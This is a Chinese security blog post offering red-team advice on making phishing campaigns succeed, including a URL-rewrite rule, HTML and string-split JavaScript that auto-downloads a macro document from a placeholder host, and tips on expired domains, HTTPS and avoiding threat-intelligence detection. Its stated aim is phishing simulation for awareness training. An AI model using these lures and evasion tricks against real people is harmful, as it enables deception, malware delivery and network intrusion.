登陆 注册

提升钓鱼成功率看这七点建议

夜翎之羽 2020-06-05 安全文摘钓鱼攻击

在红蓝对抗当中,钓鱼攻击被越来越多的红队使用,因为员工的安全意识薄弱,导致钓鱼成功的可能性很大,因为钓鱼事件导致内网被入侵的事件比比皆是,作为红队的一员做钓鱼测试的时候,如何提升钓鱼成功率,可以看看以下七点建议。

1、不直接将 payload 放置邮件内容

可以将 payload 放在自己的服务器上,通过访问服务器的方式加载 payload 

使用的钓鱼 url 最好做一下 url 重写,例如使用: 

https://phishy.domain/company/code/a2ef362e-45d0-b21d-5abf-edce29d365cb/)

而不是: 

https://phishy.domain/company/index.php

可以用下面的方式配置 apache 的 url 重写: 

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php [L,QSA]

2、不直接在邮件内容中添加恶意附件

可以通过嵌入 html、js 等方式进行恶意文件加载,html 方式如:

<a href="https://phishy.domain/payload.docm">
download the code of conduct
</a>

javascript 的方式如:

<a id="download" href="#">
download the code of conduct
</a>
<script>
document.getElementById("download").onclick = function() {
document.location = "https://phish" + "y.domain/pay" + "load.docm"; };
document.getElementById("download").click();
</script>

3、钓鱼域名使用过期域名

申请的域名最怕的是已经被安全产品标记为恶意,所以在申请域名的时候,可以去找一些刚过期的域名,为了迷惑对手,可以尝试根据关键词来搜索过期域名,然后进行注册,提升钓鱼的成功率,下面的网站是可以查询过期域名的:

https://www.expireddomains.net/backorder-expired-domains/

如下工具可以直接输入关键词就可以获得一些相似的过期域名信息,项目地址:

https://github.com/Mr-Un1k0d3r/CatMyPhish

4、搭建钓鱼网站尽量使用 https

因为浏览器会将使用 http 的网站标记为不安全,我们可以申请一些免费的 https 证书,给自己的钓鱼网站添加正常的证书,更具有迷惑性。

5、钓鱼内容尽量无趣

在企业内部经常会收到一些规章制度的邮件、或者内部发布的一些无聊且需要执行的邮件内容,大家在看到邮件内容的时候,不会过多的关注,可能默默的就完成了提示的操作,这样可以减少大家互相讨论导致的钓鱼行为被暴露的风险。

6、尽可能使用第三方的子域名

如果有正常网站的子域名可以用,尽量使用,因为这类域名通常不会被安全软件标记为恶意域名,在大众的心理也会比较信任,比如那些提供二级或者三级域名使用的云服务。

7、每次使用的域名尽量不复用

在被安全公司分析出域名存在恶意行为之后,会被标记并加入威胁情报当中,如果复用该域名,很有可能被安全软件命中威胁情报,从而提前暴露钓鱼行为,导致钓鱼测试失败。

总结

以上是作为攻击方需要注意的几点,而作为防守方,需要做的事情更多,比如提升全民安全意识、邮件安全网关、网络层入侵检测、主机层入侵检测、终端安全等,每个环节都需要进行重点防御。

对于员工安全意识提升方面,以攻促防,通过多次实际的钓鱼模拟测试来提升员工对钓鱼邮件的免疫能力,这是一个艰难而又漫长的过程

文由信安之路

生成海报
请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net